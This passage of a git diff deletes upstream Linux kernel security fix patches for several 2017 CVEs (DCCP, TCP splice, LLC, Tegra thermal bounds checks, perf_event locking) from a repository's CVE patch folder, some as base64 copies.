NDQ0LkdaMzE3NEB0d2lucy5wcm9ncmFtbWluZy5raWNrcy1hc3MubmV0ClNpZ25lZC1vZmYtYnk6IEluZ28gTW9sbmFyIDxtaW5nb0BrZXJuZWwub3JnPgpbYndoOiBCYWNrcG9ydGVkIHRvIDMuMTY6CiAtIFVzZSBBQ0NFU1NfT05DRSgpIGluc3RlYWQgb2YgUkVBRF9PTkNFKCkKIC0gVGVzdCBwZXJmX2V2ZW50Ojpncm91cF9mbGFncyBpbnN0ZWFkIG9mIGdyb3VwX2NhcHMKIC0gQWRkIHRoZSBlcnJfbG9ja2VkIGNsZWFudXAgYmxvY2ssIHdoaWNoIHdlIGRpZG4ndCBuZWVkIGJlZm9yZQogLSBBZGp1c3QgY29udGV4dF0KU2lnbmVkLW9mZi1ieTogQmVuIEh1dGNoaW5ncyA8YmVuQGRlY2FkZW50Lm9yZy51az4KU2lnbmVkLW9mZi1ieTogU3VyZW4gQmFnaGRhc2FyeWFuIDxzdXJlbmJAZ29vZ2xlLmNvbT4KLS0tCgpkaWZmIC0tZ2l0IGEva2VybmVsL2V2ZW50cy9jb3JlLmMgYi9rZXJuZWwvZXZlbnRzL2NvcmUuYwppbmRleCAxYTA1MzBmLi4xYzUzYTVjIDEwMDY0NAotLS0gYS9rZXJuZWwvZXZlbnRzL2NvcmUuYworKysgYi9rZXJuZWwvZXZlbnRzL2NvcmUuYwpAQCAtNzQ0MCw2ICs3NDQwLDM3IEBACiAJbXV0ZXhfbG9ja19uZXN0ZWQoYiwgU0lOR0xFX0RFUFRIX05FU1RJTkcpOwogfQogCisvKgorICogVmFyaWF0aW9uIG9uIHBlcmZfZXZlbnRfY3R4X2xvY2tfbmVzdGVkKCksIGV4Y2VwdCB3ZSB0YWtlIHR3byBjb250ZXh0CisgKiBtdXRleGVzLgorICovCitzdGF0aWMgc3RydWN0IHBlcmZfZXZlbnRfY29udGV4dCAqCitfX3BlcmZfZXZlbnRfY3R4X2xvY2tfZG91YmxlKHN0cnVjdCBwZXJmX2V2ZW50ICpncm91cF9sZWFkZXIsCisJCQkgICAgIHN0cnVjdCBwZXJmX2V2ZW50X2NvbnRleHQgKmN0eCkKK3sKKwlzdHJ1Y3QgcGVyZl9ldmVudF9jb250ZXh0ICpnY3R4OworCithZ2FpbjoKKwlyY3VfcmVhZF9sb2NrKCk7CisJZ2N0eCA9IEFDQ0VTU19PTkNFKGdyb3VwX2xlYWRlci0+Y3R4KTsKKwlpZiAoIWF0b21pY19pbmNfbm90X3plcm8oJmdjdHgtPnJlZmNvdW50KSkgeworCQlyY3VfcmVhZF91bmxvY2soKTsKKwkJZ290byBhZ2FpbjsKKwl9CisJcmN1X3JlYWRfdW5sb2NrKCk7CisKKwltdXRleF9sb2NrX2RvdWJsZSgmZ2N0eC0+bXV0ZXgsICZjdHgtPm11dGV4KTsKKworCWlmIChncm91cF9sZWFkZXItPmN0eCAhPSBnY3R4KSB7CisJCW11dGV4X3VubG9jaygmY3R4LT5tdXRleCk7CisJCW11dGV4X3VubG9jaygmZ2N0eC0+bXV0ZXgpOworCQlwdXRfY3R4KGdjdHgpOworCQlnb3RvIGFnYWluOworCX0KKworCXJldHVybiBnY3R4OworfQorCiAvKioKICAqIHN5c19wZXJmX2V2ZW50X29wZW4gLSBvcGVuIGEgcGVyZm9ybWFuY2UgZXZlbnQsIGFzc29jaWF0ZSBpdCB0byBhIHRhc2svY3B1CiAgKgpAQCAtNzY1NiwxNCArNzY4NywzMSBAQAogCX0KIAogCWlmIChtb3ZlX2dyb3VwKSB7Ci0JCWdjdHggPSBncm91cF9sZWFkZXItPmN0eDsKKwkJZ2N0eCA9IF9fcGVyZl9ldmVudF9jdHhfbG9ja19kb3VibGUoZ3JvdXBfbGVhZGVyLCBjdHgpOworCisJCS8qCisJCSAqIENoZWNrIGlmIHdlIHJhY2VkIGFnYWluc3QgYW5vdGhlciBzeXNfcGVyZl9ldmVudF9vcGVuKCkgY2FsbAorCQkgKiBtb3ZpbmcgdGhlIHNvZnR3YXJlIGdyb3VwIHVuZGVybmVhdGggdXMuCisJCSAqLworCQlpZiAoIShncm91cF9sZWFkZXItPmdyb3VwX2ZsYWdzICYgUEVSRl9HUk9VUF9TT0ZUV0FSRSkpIHsKKwkJCS8qCisJCQkgKiBJZiBzb21lb25lIG1vdmVkIHRoZSBncm91cCBvdXQgZnJvbSB1bmRlciB1cywgY2hlY2sKKwkJCSAqIGlmIHRoaXMgbmV3IGV2ZW50IHdvdW5kIHVwIG9uIHRoZSBzYW1lIGN0eCwgaWYgc28KKwkJCSAqIGl0cyB0aGUgcmVndWxhciAhbW92ZV9ncm91cCBjYXNlLCBvdGhlcndpc2UgZmFpbC4KKwkJCSAqLworCQkJaWYgKGdjdHggIT0gY3R4KSB7CisJCQkJZXJyID0gLUVJTlZBTDsKKwkJCQlnb3RvIGVycl9sb2NrZWQ7CisJCQl9IGVsc2UgeworCQkJCXBlcmZfZXZlbnRfY3R4X3VubG9jayhncm91cF9sZWFkZXIsIGdjdHgpOworCQkJCW1vdmVfZ3JvdXAgPSAwOworCQkJfQorCQl9CiAKIAkJLyoKIAkJICogU2VlIHBlcmZfZXZlbnRfY3R4X2xvY2soKSBmb3IgY29tbWVudHMgb24gdGhlIGRldGFpbHMKIAkJICogb2Ygc3dpenpsaW5nIHBlcmZfZXZlbnQ6OmN0eC4KIAkJICovCi0JCW11dGV4X2xvY2tfZG91YmxlKCZnY3R4LT5tdXRleCwgJmN0eC0+bXV0ZXgpOwotCiAJCXBlcmZfcmVtb3ZlX2Zyb21fY29udGV4dChncm91cF9sZWFkZXIsIGZhbHNlKTsKIAogCQkvKgpAQCAtNzcwNCw3ICs3NzUyLDcgQEAKIAlwZXJmX3VucGluX2NvbnRleHQoY3R4KTsKIAogCWlmIChtb3ZlX2dyb3VwKSB7Ci0JCW11dGV4X3VubG9jaygmZ2N0eC0+bXV0ZXgpOworCQlwZXJmX2V2ZW50X2N0eF91bmxvY2soZ3JvdXBfbGVhZGVyLCBnY3R4KTsKIAkJcHV0X2N0eChnY3R4KTsKIAl9CiAJbXV0ZXhfdW5sb2NrKCZjdHgtPm11dGV4KTsKQEAgLTc3MzMsNiArNzc4MSwxMSBAQAogCWZkX2luc3RhbGwoZXZlbnRfZmQsIGV2ZW50X2ZpbGUpOwogCXJldHVybiBldmVudF9mZDsKIAorZXJyX2xvY2tlZDoKKwlpZiAobW92ZV9ncm91cCkKKwkJcGVyZl9ldmVudF9jdHhfdW5sb2NrKGdyb3VwX2xlYWRlciwgZ2N0eCk7CisJbXV0ZXhfdW5sb2NrKCZjdHgtPm11dGV4KTsKKwlmcHV0KGV2ZW50X2ZpbGUpOwogZXJyX2NvbnRleHQ6CiAJcGVyZl91bnBpbl9jb250ZXh0KGN0eCk7CiAJcHV0X2N0eChjdHgpOwo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch
deleted file mode 100644
index 79c6a180..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Thu, 16 Feb 2017 17:22:46 +0100
-Subject: dccp: fix freeing skb too early for IPV6_RECVPKTINFO
-
-In the current DCCP implementation an skb for a DCCP_PKT_REQUEST packet
-is forcibly freed via __kfree_skb in dccp_rcv_state_process if
-dccp_v6_conn_request successfully returns.
-
-However, if IPV6_RECVPKTINFO is set on a socket, the address of the skb
-is saved to ireq->pktopts and the ref count for skb is incremented in
-dccp_v6_conn_request, so skb is still in use. Nevertheless, it gets freed
-in dccp_rcv_state_process.
-
-Fix by calling consume_skb instead of doing goto discard and therefore
-calling __kfree_skb.
-
-Similar fixes for TCP:
-
-fb7e2399ec17f1004c0e0ccfd17439f8759ede01 [TCP]: skb is unexpectedly freed.
-0aea76d35c9651d55bbaf746e7914e5f9ae5a25d tcp: SYN packets are now
-simply consumed
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/dccp/input.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/dccp/input.c b/net/dccp/input.c
-index ba34718..8fedc2d 100644
---- a/net/dccp/input.c
-+++ b/net/dccp/input.c
-@@ -606,7 +606,8 @@ int dccp_rcv_state_process(struct sock *sk, struct sk_buff *skb,
- 			if (inet_csk(sk)->icsk_af_ops->conn_request(sk,
- 								    skb) < 0)
- 				return 1;
--			goto discard;
-+			consume_skb(skb);
-+			return 0;
- 		}
- 		if (dh->dccph_type == DCCP_PKT_RESET)
- 			goto discard;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch
deleted file mode 100644
index f5a8edac..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From ccf7abb93af09ad0868ae9033d1ca8108bdaec82 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Fri, 3 Feb 2017 14:59:38 -0800
-Subject: tcp: avoid infinite loop in tcp_splice_read()
-
-Splicing from TCP socket is vulnerable when a packet with URG flag is
-received and stored into receive queue.
-
-__tcp_splice_read() returns 0, and sk_wait_data() immediately
-returns since there is the problematic skb in queue.
-
-This is a nice way to burn cpu (aka infinite loop) and trigger
-soft lockups.
-
-Again, this gem was found by syzkaller tool.
-
-Fixes: 9c55e01c0cc8 ("[TCP]: Splice receive support.")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Dmitry Vyukov  <dvyukov@google.com>
-Cc: Willy Tarreau <w@1wt.eu>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/tcp.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
-index 4a04496..0efb4c7 100644
---- a/net/ipv4/tcp.c
-+++ b/net/ipv4/tcp.c
-@@ -770,6 +770,12 @@ ssize_t tcp_splice_read(struct socket *sock, loff_t *ppos,
- 				ret = -EAGAIN;
- 				break;
- 			}
-+			/* if __tcp_splice_read() got nothing while we have
-+			 * an skb in receive queue, we do not want to loop.
-+			 * This might happen with URG data.
-+			 */
-+			if (!skb_queue_empty(&sk->sk_receive_queue))
-+				break;
- 			sk_wait_data(sk, &timeo, NULL);
- 			if (signal_pending(current)) {
- 				ret = sock_intr_errno(timeo);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch
deleted file mode 100644
index 606bc5b0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-index 1dcaba4..e08cf95 100644
---- a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-@@ -1613,6 +1613,9 @@
- 	int tstate, throt_cur_tstate, edp_cur_tstate;
- 	unsigned long freq, cur_freq = ULONG_MAX;
- 
-+	if (cur_state > bthrot_ins->throt_tab_size)
-+		return -EINVAL;
-+
- 	if (bthrot_ins->cur_state == cur_state)
- 		return 0;
- 
-diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-index a18e4c9..1243d21 100644
---- a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-@@ -314,6 +314,9 @@
- 	struct gk20a_volt_priv *priv = (struct gk20a_volt_priv *)cdev->devdata;
- 	struct nvkm_volt *volt = &priv->base;
- 
-+	if (cur_state >= MAX_THERMAL_LIMITS)
-+		return -EINVAL;
-+
- 	mutex_lock(&volt->therm_lock);
- 
- 	if (priv->therm_idx == cur_state)
-diff --git a/drivers/soc/tegra/tegra-dvfs.c b/drivers/soc/tegra/tegra-dvfs.c
-index 5c0af3b..990cd61 100644
---- a/drivers/soc/tegra/tegra-dvfs.c
-+++ b/drivers/soc/tegra/tegra-dvfs.c
-@@ -1068,6 +1068,14 @@
- 	if (IS_ERR_OR_NULL(tegra_core_rail) || !tegra_core_rail->is_ready)
- 		return -EINVAL;
- 
-+	if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) {
-+		if (new_idx >= rail->therm_floors_size)
-+			return -EINVAL;
-+	} else if (type == TEGRA_DVFS_CORE_THERMAL_CAP) {
-+		if (new_idx > rail->therm_caps_size)
-+			return -EINVAL;
-+	}
-+
- 	mutex_lock(&dvfs_lock);
- 	if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) {
- 		if (rail->therm_floor_idx != new_idx) {
-diff --git a/drivers/thermal/tegra/tegra_throttle.c b/drivers/thermal/tegra/tegra_throttle.c
-index 39a913e..e9991db 100644
---- a/drivers/thermal/tegra/tegra_throttle.c
-+++ b/drivers/thermal/tegra/tegra_throttle.c
-@@ -198,6 +198,9 @@
- 	if (bthrot->cpu_freq_table == NULL)
- 		return 0;
- 
-+	if (cur_state > bthrot_ins->throt_tab_size)
-+		return -EINVAL;
-+
- 	if (bthrot_ins->cur_state == cur_state)
- 		return 0;
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64
deleted file mode 100644
index dfe3bd98..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L2Nsay9nbTIwYi5jIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKaW5kZXggMWRjYWJhNC4uZTA4Y2Y5NSAxMDA2NDQKLS0tIGEvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKKysrIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKQEAgLTE2MTMsNiArMTYxMyw5IEBACiAJaW50IHRzdGF0ZSwgdGhyb3RfY3VyX3RzdGF0ZSwgZWRwX2N1cl90c3RhdGU7CiAJdW5zaWduZWQgbG9uZyBmcmVxLCBjdXJfZnJlcSA9IFVMT05HX01BWDsKIAorCWlmIChjdXJfc3RhdGUgPiBidGhyb3RfaW5zLT50aHJvdF90YWJfc2l6ZSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAlpZiAoYnRocm90X2lucy0+Y3VyX3N0YXRlID09IGN1cl9zdGF0ZSkKIAkJcmV0dXJuIDA7CiAKZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L3ZvbHQvZ2syMGEuYyBiL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L3ZvbHQvZ2syMGEuYwppbmRleCBhMThlNGM5Li4xMjQzZDIxIDEwMDY0NAotLS0gYS9kcml2ZXJzL2dwdS9kcm0vbm91dmVhdS9udmttL3N1YmRldi92b2x0L2drMjBhLmMKKysrIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvdm9sdC9nazIwYS5jCkBAIC0zMTQsNiArMzE0LDkgQEAKIAlzdHJ1Y3QgZ2syMGFfdm9sdF9wcml2ICpwcml2ID0gKHN0cnVjdCBnazIwYV92b2x0X3ByaXYgKiljZGV2LT5kZXZkYXRhOwogCXN0cnVjdCBudmttX3ZvbHQgKnZvbHQgPSAmcHJpdi0+YmFzZTsKIAorCWlmIChjdXJfc3RhdGUgPj0gTUFYX1RIRVJNQUxfTElNSVRTKQorCQlyZXR1cm4gLUVJTlZBTDsKKwogCW11dGV4X2xvY2soJnZvbHQtPnRoZXJtX2xvY2spOwogCiAJaWYgKHByaXYtPnRoZXJtX2lkeCA9PSBjdXJfc3RhdGUpCmRpZmYgLS1naXQgYS9kcml2ZXJzL3NvYy90ZWdyYS90ZWdyYS1kdmZzLmMgYi9kcml2ZXJzL3NvYy90ZWdyYS90ZWdyYS1kdmZzLmMKaW5kZXggNWMwYWYzYi4uOTkwY2Q2MSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zb2MvdGVncmEvdGVncmEtZHZmcy5jCisrKyBiL2RyaXZlcnMvc29jL3RlZ3JhL3RlZ3JhLWR2ZnMuYwpAQCAtMTA2OCw2ICsxMDY4LDE0IEBACiAJaWYgKElTX0VSUl9PUl9OVUxMKHRlZ3JhX2NvcmVfcmFpbCkgfHwgIXRlZ3JhX2NvcmVfcmFpbC0+aXNfcmVhZHkpCiAJCXJldHVybiAtRUlOVkFMOwogCisJaWYgKHR5cGUgPT0gVEVHUkFfRFZGU19DT1JFX1RIRVJNQUxfRkxPT1IpIHsKKwkJaWYgKG5ld19pZHggPj0gcmFpbC0+dGhlcm1fZmxvb3JzX3NpemUpCisJCQlyZXR1cm4gLUVJTlZBTDsKKwl9IGVsc2UgaWYgKHR5cGUgPT0gVEVHUkFfRFZGU19DT1JFX1RIRVJNQUxfQ0FQKSB7CisJCWlmIChuZXdfaWR4ID4gcmFpbC0+dGhlcm1fY2Fwc19zaXplKQorCQkJcmV0dXJuIC1FSU5WQUw7CisJfQorCiAJbXV0ZXhfbG9jaygmZHZmc19sb2NrKTsKIAlpZiAodHlwZSA9PSBURUdSQV9EVkZTX0NPUkVfVEhFUk1BTF9GTE9PUikgewogCQlpZiAocmFpbC0+dGhlcm1fZmxvb3JfaWR4ICE9IG5ld19pZHgpIHsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvdGhlcm1hbC90ZWdyYS90ZWdyYV90aHJvdHRsZS5jIGIvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKaW5kZXggMzlhOTEzZS4uZTk5OTFkYiAxMDA2NDQKLS0tIGEvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKKysrIGIvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKQEAgLTE5OCw2ICsxOTgsOSBAQAogCWlmIChidGhyb3QtPmNwdV9mcmVxX3RhYmxlID09IE5VTEwpCiAJCXJldHVybiAwOwogCisJaWYgKGN1cl9zdGF0ZSA+IGJ0aHJvdF9pbnMtPnRocm90X3RhYl9zaXplKQorCQlyZXR1cm4gLUVJTlZBTDsKKwogCWlmIChidGhyb3RfaW5zLT5jdXJfc3RhdGUgPT0gY3VyX3N0YXRlKQogCQlyZXR1cm4gMDsKIAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch
deleted file mode 100644
index 606bc5b0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-index 1dcaba4..e08cf95 100644
---- a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c
-@@ -1613,6 +1613,9 @@
- 	int tstate, throt_cur_tstate, edp_cur_tstate;
- 	unsigned long freq, cur_freq = ULONG_MAX;
- 
-+	if (cur_state > bthrot_ins->throt_tab_size)
-+		return -EINVAL;
-+
- 	if (bthrot_ins->cur_state == cur_state)
- 		return 0;
- 
-diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-index a18e4c9..1243d21 100644
---- a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c
-@@ -314,6 +314,9 @@
- 	struct gk20a_volt_priv *priv = (struct gk20a_volt_priv *)cdev->devdata;
- 	struct nvkm_volt *volt = &priv->base;
- 
-+	if (cur_state >= MAX_THERMAL_LIMITS)
-+		return -EINVAL;
-+
- 	mutex_lock(&volt->therm_lock);
- 
- 	if (priv->therm_idx == cur_state)
-diff --git a/drivers/soc/tegra/tegra-dvfs.c b/drivers/soc/tegra/tegra-dvfs.c
-index 5c0af3b..990cd61 100644
---- a/drivers/soc/tegra/tegra-dvfs.c
-+++ b/drivers/soc/tegra/tegra-dvfs.c
-@@ -1068,6 +1068,14 @@
- 	if (IS_ERR_OR_NULL(tegra_core_rail) || !tegra_core_rail->is_ready)
- 		return -EINVAL;
- 
-+	if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) {
-+		if (new_idx >= rail->therm_floors_size)
-+			return -EINVAL;
-+	} else if (type == TEGRA_DVFS_CORE_THERMAL_CAP) {
-+		if (new_idx > rail->therm_caps_size)
-+			return -EINVAL;
-+	}
-+
- 	mutex_lock(&dvfs_lock);
- 	if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) {
- 		if (rail->therm_floor_idx != new_idx) {
-diff --git a/drivers/thermal/tegra/tegra_throttle.c b/drivers/thermal/tegra/tegra_throttle.c
-index 39a913e..e9991db 100644
---- a/drivers/thermal/tegra/tegra_throttle.c
-+++ b/drivers/thermal/tegra/tegra_throttle.c
-@@ -198,6 +198,9 @@
- 	if (bthrot->cpu_freq_table == NULL)
- 		return 0;
- 
-+	if (cur_state > bthrot_ins->throt_tab_size)
-+		return -EINVAL;
-+
- 	if (bthrot_ins->cur_state == cur_state)
- 		return 0;
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64
deleted file mode 100644
index dfe3bd98..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L2Nsay9nbTIwYi5jIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKaW5kZXggMWRjYWJhNC4uZTA4Y2Y5NSAxMDA2NDQKLS0tIGEvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKKysrIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvY2xrL2dtMjBiLmMKQEAgLTE2MTMsNiArMTYxMyw5IEBACiAJaW50IHRzdGF0ZSwgdGhyb3RfY3VyX3RzdGF0ZSwgZWRwX2N1cl90c3RhdGU7CiAJdW5zaWduZWQgbG9uZyBmcmVxLCBjdXJfZnJlcSA9IFVMT05HX01BWDsKIAorCWlmIChjdXJfc3RhdGUgPiBidGhyb3RfaW5zLT50aHJvdF90YWJfc2l6ZSkKKwkJcmV0dXJuIC1FSU5WQUw7CisKIAlpZiAoYnRocm90X2lucy0+Y3VyX3N0YXRlID09IGN1cl9zdGF0ZSkKIAkJcmV0dXJuIDA7CiAKZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L3ZvbHQvZ2syMGEuYyBiL2RyaXZlcnMvZ3B1L2RybS9ub3V2ZWF1L252a20vc3ViZGV2L3ZvbHQvZ2syMGEuYwppbmRleCBhMThlNGM5Li4xMjQzZDIxIDEwMDY0NAotLS0gYS9kcml2ZXJzL2dwdS9kcm0vbm91dmVhdS9udmttL3N1YmRldi92b2x0L2drMjBhLmMKKysrIGIvZHJpdmVycy9ncHUvZHJtL25vdXZlYXUvbnZrbS9zdWJkZXYvdm9sdC9nazIwYS5jCkBAIC0zMTQsNiArMzE0LDkgQEAKIAlzdHJ1Y3QgZ2syMGFfdm9sdF9wcml2ICpwcml2ID0gKHN0cnVjdCBnazIwYV92b2x0X3ByaXYgKiljZGV2LT5kZXZkYXRhOwogCXN0cnVjdCBudmttX3ZvbHQgKnZvbHQgPSAmcHJpdi0+YmFzZTsKIAorCWlmIChjdXJfc3RhdGUgPj0gTUFYX1RIRVJNQUxfTElNSVRTKQorCQlyZXR1cm4gLUVJTlZBTDsKKwogCW11dGV4X2xvY2soJnZvbHQtPnRoZXJtX2xvY2spOwogCiAJaWYgKHByaXYtPnRoZXJtX2lkeCA9PSBjdXJfc3RhdGUpCmRpZmYgLS1naXQgYS9kcml2ZXJzL3NvYy90ZWdyYS90ZWdyYS1kdmZzLmMgYi9kcml2ZXJzL3NvYy90ZWdyYS90ZWdyYS1kdmZzLmMKaW5kZXggNWMwYWYzYi4uOTkwY2Q2MSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zb2MvdGVncmEvdGVncmEtZHZmcy5jCisrKyBiL2RyaXZlcnMvc29jL3RlZ3JhL3RlZ3JhLWR2ZnMuYwpAQCAtMTA2OCw2ICsxMDY4LDE0IEBACiAJaWYgKElTX0VSUl9PUl9OVUxMKHRlZ3JhX2NvcmVfcmFpbCkgfHwgIXRlZ3JhX2NvcmVfcmFpbC0+aXNfcmVhZHkpCiAJCXJldHVybiAtRUlOVkFMOwogCisJaWYgKHR5cGUgPT0gVEVHUkFfRFZGU19DT1JFX1RIRVJNQUxfRkxPT1IpIHsKKwkJaWYgKG5ld19pZHggPj0gcmFpbC0+dGhlcm1fZmxvb3JzX3NpemUpCisJCQlyZXR1cm4gLUVJTlZBTDsKKwl9IGVsc2UgaWYgKHR5cGUgPT0gVEVHUkFfRFZGU19DT1JFX1RIRVJNQUxfQ0FQKSB7CisJCWlmIChuZXdfaWR4ID4gcmFpbC0+dGhlcm1fY2Fwc19zaXplKQorCQkJcmV0dXJuIC1FSU5WQUw7CisJfQorCiAJbXV0ZXhfbG9jaygmZHZmc19sb2NrKTsKIAlpZiAodHlwZSA9PSBURUdSQV9EVkZTX0NPUkVfVEhFUk1BTF9GTE9PUikgewogCQlpZiAocmFpbC0+dGhlcm1fZmxvb3JfaWR4ICE9IG5ld19pZHgpIHsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvdGhlcm1hbC90ZWdyYS90ZWdyYV90aHJvdHRsZS5jIGIvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKaW5kZXggMzlhOTEzZS4uZTk5OTFkYiAxMDA2NDQKLS0tIGEvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKKysrIGIvZHJpdmVycy90aGVybWFsL3RlZ3JhL3RlZ3JhX3Rocm90dGxlLmMKQEAgLTE5OCw2ICsxOTgsOSBAQAogCWlmIChidGhyb3QtPmNwdV9mcmVxX3RhYmxlID09IE5VTEwpCiAJCXJldHVybiAwOwogCisJaWYgKGN1cl9zdGF0ZSA+IGJ0aHJvdF9pbnMtPnRocm90X3RhYl9zaXplKQorCQlyZXR1cm4gLUVJTlZBTDsKKwogCWlmIChidGhyb3RfaW5zLT5jdXJfc3RhdGUgPT0gY3VyX3N0YXRlKQogCQlyZXR1cm4gMDsKIAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch
deleted file mode 100644
index 57b5bbc9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 8b74d439e1697110c5e5c600643e823eb1dd0762 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Sun, 12 Feb 2017 14:03:52 -0800
-Subject: net/llc: avoid BUG_ON() in skb_orphan()
-
-It seems nobody used LLC since linux-3.12.
-
-Fortunately fuzzers like syzkaller still know how to run this code,
-otherwise it would be no fun.
-
-Setting skb->sk without skb->destructor leads to all kinds of
-bugs, we now prefer to be very strict about it.
-
-Ideally here we would use skb_set_owner() but this helper does not exist yet,
-only CAN seems to have a private helper for that.
-
-Fixes: 376c7311bdb6 ("net: add a temporary sanity check in skb_orphan()")
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/llc/llc_conn.c | 3 +++
- net/llc/llc_sap.c  | 3 +++
- 2 files changed, 6 insertions(+)
-
-diff --git a/net/llc/llc_conn.c b/net/llc/llc_conn.c
-index 3e821da..8bc5a1b 100644
---- a/net/llc/llc_conn.c
-+++ b/net/llc/llc_conn.c
-@@ -821,7 +821,10 @@ void llc_conn_handler(struct llc_sap *sap, struct sk_buff *skb)
- 		 * another trick required to cope with how the PROCOM state
- 		 * machine works. -acme
- 		 */
-+		skb_orphan(skb);
-+		sock_hold(sk);
